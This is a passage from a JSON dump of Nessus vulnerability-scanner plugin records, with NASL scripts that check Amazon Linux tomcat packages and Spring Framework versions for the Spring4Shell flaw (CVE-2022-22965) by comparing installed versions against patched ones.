update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tomcat installed on the remote host is prior to 9.0.65-1. It is, therefore, affected by a vulnerability\nas referenced in the ALAS2TOMCAT9-2023-004 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. 
The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALASTOMCAT9-2023-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22965.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/08/21\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'tomcat-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-admin-webapps-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-docs-webapp-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-el-3.0-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-jsp-2.3-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-jsvc-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-lib-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-servlet-4.0-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-webapps-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':'tomcat9'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:42:56", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. 
It is, therefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled as well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING_CVE-2022-22965_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159374);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 
5.3.18 Remote Code Execution (CVE-2022-22965)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is,\ntherefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via\n data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application\n is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the\n nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their\nscan policy in order to enable this plugin in a scan. 
In addition, the 'Perform thorough tests' setting must be enabled\nas well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22965\");\n # https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?718f9ac3\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.18 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/31\");\n\n 
script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"requires_paranoid_scanning\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\", \"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\", \"java_jre_installed_unix.nbin\", \"java_jre_installed_win.nbin\");\n script_require_keys(\"installed_sw/Spring Framework\", \"installed_sw/Apache Tomcat\", \"installed_sw/Java\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('tomcat_version.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Spring Framework');\n\n# A vuln version of Java must be installed for the exploit to work\nvar java_exit_message = 'A vulnerable version of Java is not installed. 
Spring Framework is, therefore, not vulnerable.';\nvar java_install_count = get_install_count(app_name:'Java', exit_if_zero:FALSE);\nif (java_install_count < 1)\n exit(0, java_exit_message);\nvar java_installs = get_combined_installs(app_name:'Java');\nif (java_installs[0] != IF_OK)\n exit(0, java_exit_message);\n\n# JDK 9+ is vulnerable\n# Exit if all detected Java installs are < 9\nvar vuln_java = FALSE;\nforeach var java_install (java_installs[1])\n{\n var java_version = str_replace(string:java_install.version, find:'_', replace:'.');\n if ( ver_compare(ver:java_version, fix:'1.9.0', strict:FALSE) >= 0 )\n {\n vuln_java = TRUE;\n break;\n }\n}\n\nif (!vuln_java)\n exit(0, java_exit_message);\n\n# A \"vulnerable\" version of Tomcat must be installed for the exploit to work\nvar tomcat_exit_message = 'A vulnerable version of Apache Tomcat is not installed. Spring Framework is, therefore, not vulnerable.';\nvar tomcat_install_count = get_install_count(app_name:'Apache Tomcat', exit_if_zero:FALSE);\nif (tomcat_install_count < 1)\n exit(0, tomcat_exit_message);\nvar tomcat_installs = get_combined_installs(app_name:'Apache Tomcat');\nif (tomcat_installs[0] != IF_OK)\n exit(0, tomcat_exit_message);\n\n# Tomcat 10.0.20, 9.0.62, and 8.5.78 are patched\n# Exit if all detected Tomcat installs are patched\nvar vuln_tomcat = FALSE;\nforeach var install (tomcat_installs[1])\n{\n if (\n tomcat_ver_cmp(ver:install.version, fix:'10.0.20', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'9.0.62', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'8.5.78', same_branch:TRUE) < 0\n )\n {\n vuln_tomcat = TRUE;\n break;\n }\n}\n\nif (!vuln_tomcat)\n exit(0, tomcat_exit_message);\n\n# Non-default configuration\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.18' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, 
severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-03T19:11:38", "description": "The version of tomcat installed on the remote host is prior to 8.5.79-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2TOMCAT8.5-2023-005 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks. 
(CVE-2022-29885)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-27T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALASTOMCAT8.5-2023-005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965", "CVE-2022-29885"], "modified": "2023-10-02T00:00:00", "cpe": ["cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-javadoc", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-webapps", "p-cpe:/a:amazon:linux:tomcat-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat-servlet-3.1-api"], "id": "AL2_ALASTOMCAT8_5-2023-005.NASL", "href": "https://www.tenable.com/plugins/nessus/181988", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALASTOMCAT8.5-2023-005.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(181988);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/02\");\n\n script_cve_id(\"CVE-2022-22965\", \"CVE-2022-29885\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2022-A-0222-S\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALASTOMCAT8.5-2023-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tomcat installed on the remote host is prior to 8.5.79-1. 
It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2TOMCAT8.5-2023-005 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and\n 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an\n untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and\n integrity protection, it does not protect against all risks associated with running over any untrusted\n network, particularly DoS risks. 
(CVE-2022-29885)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALASTOMCAT8.5-2023-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22965.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-29885.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"III\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'tomcat-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-admin-webapps-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-docs-webapp-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-el-3.0-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-javadoc-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-jsp-2.3-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-jsvc-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-lib-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-servlet-3.1-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':'tomcat8.5'},\n {'reference':'tomcat-webapps-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:48:32", "description": "The version of Dell Wyse Management Suite installed on the remote host is prior to tested 
version. It is, therefore, affected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters. Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). 
Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-08T00:00:00", "type": "nessus", "title": "Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0778", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:dell:wyse_management_suite"], "id": "DELL_WYSE_MANAGEMENT_SUITE_DSA-2022-098.NASL", "href": 